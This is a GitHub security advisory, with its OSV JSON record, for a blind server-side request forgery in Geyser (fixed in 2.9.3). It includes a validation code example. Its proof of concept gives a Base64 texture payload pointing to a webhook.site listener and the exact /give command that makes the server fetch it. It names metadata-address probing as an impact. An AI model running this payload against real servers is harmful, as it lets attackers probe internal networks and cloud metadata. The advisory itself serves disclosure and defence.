GHSA-XCFG-FCR5-GW9R

Vulnerability from github – Published: 2026-05-05 20:03 – Updated: 2026-05-13 14:19
Summary
Geyser Vulnerable to Server-Side Request Forgery (SSRF) via Player Head Texture URL in Geyser
Details

Summary

A server-side request forgery (SSRF) vulnerability exists in Geyser’s handling of Bedrock player head texture data. By supplying a crafted Base64-encoded skin texture URL via the /give command, an attacker can cause the Minecraft server to issue arbitrary HTTP GET requests to attacker-controlled or internal endpoints. This occurs server-side, without proper URL validation, and can be triggered by a Bedrock client.

Details

Geyser allows Bedrock clients to interact with Java Edition mechanics, including the creation of custom player heads using the minecraft:profile NBT structure.

When a player head is created with a custom textures property, Geyser processes the Base64-encoded JSON value and forwards the embedded texture URL for resolution. However, the URL contained in the textures.SKIN.url field is not sufficiently validated.
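The missing step described above is validation of the decoded textures.SKIN.url before the server fetches it. The following is an added illustration in Python, not Geyser's own code and not necessarily how the 2.9.3 fix works: it decodes the Base64 property, pulls out the URL and refuses anything that is not an https URL on an allowlisted texture host (textures.minecraft.net is an assumed allowlist entry), rejecting IP-literal hosts such as metadata addresses outright. All function names are hypothetical.

```python
import base64
import ipaddress
import json
from urllib.parse import urlsplit

# Constructed allowlist for this example (the host Mojang serves skins from);
# a real deployment would take it from configuration.
ALLOWED_TEXTURE_HOSTS = {"textures.minecraft.net"}


def encode_textures_property(url: str) -> str:
    """Build the Base64 'textures' value a player head carries (fixture helper)."""
    return base64.b64encode(json.dumps({"textures": {"SKIN": {"url": url}}}).encode()).decode()


def extract_skin_url(textures_value: str):
    """Decode the Base64 JSON value; return textures.SKIN.url, or None if absent/malformed."""
    try:
        doc = json.loads(base64.b64decode(textures_value, validate=True))
        url = doc["textures"]["SKIN"]["url"]
    except (ValueError, UnicodeDecodeError, KeyError, TypeError):
        return None
    return url if isinstance(url, str) else None


def skin_url_problem(url: str):
    """Return None if the URL may be fetched, else the reason it is rejected."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        return f"scheme not allowed: {parts.scheme!r}"
    host = (parts.hostname or "").lower()
    try:
        ipaddress.ip_address(host)  # e.g. 169.254.169.254 is never a texture host
    except ValueError:
        pass
    else:
        return f"IP literal host not allowed: {host}"
    if host not in ALLOWED_TEXTURE_HOSTS:
        return f"host not allowlisted: {host!r}"
    return None


def check_textures_property(textures_value: str) -> tuple:
    """Gate to run before any server-side fetch: (True, url) or (False, reason)."""
    url = extract_skin_url(textures_value)
    if url is None:
        return False, "missing or undecodable textures.SKIN.url"
    problem = skin_url_problem(url)
    return (True, url) if problem is None else (False, problem)
```

Because the SSRF is blind, a rejected property should also be logged with the offending host so operators can spot probing attempts in server logs.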

PoC

  1. Setup Environment:
     • Set up a Minecraft Server (Paper/Spigot) with the latest version of Geyser installed.
     • Ensure you have a Bedrock client connected.

  2. Prepare Listener:
     • Go to webhook.site and obtain a unique URL (e.g., https://webhook.site/YOUR-UUID).

  3. Construct Payload:
     • Create a JSON payload pointing to your listener URL: {"textures":{"SKIN":{"url":"https://webhook.site/YOUR-UUID"}}}
     • Encode this JSON string to Base64. (You can use a terminal command: echo -n '{"textures":{"SKIN":{"url":"..."}}}' | base64)

  4. Execute Command:
     • Run the following command in the Bedrock Edition client: /give @p minecraft:player_head[minecraft:profile={properties:[{name:"textures",value:"[PASTE_BASE64_HERE]"}]}]

  5. Verify:
     • Check the webhook.site dashboard.
     • You will see an HTTP GET request originating from the Minecraft Server's IP address, not the client's IP.

Impact

This vulnerability allows server-side request forgery (SSRF) from the Minecraft server to arbitrary HTTP endpoints.

Affected Parties

  • Minecraft servers running Geyser
  • Server operators exposing internal or cloud metadata endpoints

Potential Impacts

  • Internal network probing (e.g., intranet services, admin panels)
  • Cloud metadata access attempts (e.g., 169.254.169.254)
  • IP address disclosure of the Minecraft server
  • Abuse of the server as an HTTP request proxy

Although the vulnerability is blind SSRF (no response data returned to the attacker), it is still useful for:

  • Network mapping
  • Firewall bypass attempts
  • Cloud environment fingerprinting


{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.9.2"
      },
      "package": {
        "ecosystem": "Maven",
        "name": "org.geysermc.geyser:core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.9.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42188"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-05T20:03:16Z",
    "nvd_published_at": "2026-05-11T22:22:11Z",
    "severity": "LOW"
  },
  "details": "### Summary\nA server-side request forgery (SSRF) vulnerability exists in Geyser\u2019s handling of Bedrock player head texture data.\nBy supplying a crafted Base64-encoded skin texture URL via the /give command, an attacker can cause the Minecraft server to issue arbitrary HTTP GET requests to attacker-controlled or internal endpoints.\nThis occurs server-side, without proper URL validation, and can be triggered by a Bedrock client.\n\n### Details\nGeyser allows Bedrock clients to interact with Java Edition mechanics, including the creation of custom player heads using the minecraft:profile NBT structure.\n\nWhen a player head is created with a custom textures property, Geyser processes the Base64-encoded JSON value and forwards the embedded texture URL for resolution.\nHowever, the URL contained in the textures.SKIN.url field is not sufficiently validated.\n### PoC\n\n1. **Setup Environment:**\n   - Set up a Minecraft Server (Paper/Spigot) with the latest version of Geyser installed.\n   - Ensure you have a Bedrock client connected.\n\n2. **Prepare Listener:**\n   - Go to [webhook.site](https://webhook.site) and obtain a unique URL (e.g., `https://webhook.site/YOUR-UUID`).\n\n3. **Construct Payload:**\n   - Create a JSON payload pointing to your listener URL:\n     `{\"textures\":{\"SKIN\":{\"url\":\"https://webhook.site/YOUR-UUID\"}}}`\n   - Encode this JSON string to Base64.\n     *(You can use a terminal command: `echo -n \u0027{\"textures\":{\"SKIN\":{\"url\":\"...\"}}}\u0027 | base64`)*\n\n4. **Execute Command:**\n   - Run the following command in the Bedrock Edition client:\n   `/give @p minecraft:player_head[minecraft:profile={properties:[{name:\"textures\",value:\"[PASTE_BASE64_HERE]\"}]}]`\n\n5. **Verify:**\n   - Check the webhook.site dashboard.\n   - You will see an **HTTP GET request originating from the Minecraft Server\u0027s IP address**, not the client\u0027s IP.\n\n### Impact\nThis vulnerability allows server-side request forgery (SSRF) from the Minecraft server to arbitrary HTTP endpoints.\n\n#### Affected Parties\n- Minecraft servers running Geyser\n- Server operators exposing internal or cloud metadata endpoints\n\n#### Potential Impacts\n- Internal network probing (e.g., intranet services, admin panels)\n- Cloud metadata access attempts (e.g., 169.254.169.254)\n- IP address disclosure of the Minecraft server\n- Abuse of the server as an HTTP request proxy\n\nAlthough the vulnerability is blind SSRF (no response data returned to the attacker), it is still useful for:\n- Network mapping\n- Firewall bypass attempts\n- Cloud environment fingerprinting",
  "id": "GHSA-xcfg-fcr5-gw9r",
  "modified": "2026-05-13T14:19:57Z",
  "published": "2026-05-05T20:03:16Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/GeyserMC/Geyser/security/advisories/GHSA-xcfg-fcr5-gw9r"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42188"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/GeyserMC/Geyser"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Geyser Vulnerable to Server-Side Request Forgery (SSRF) via Player Head Texture URL in Geyser"
}

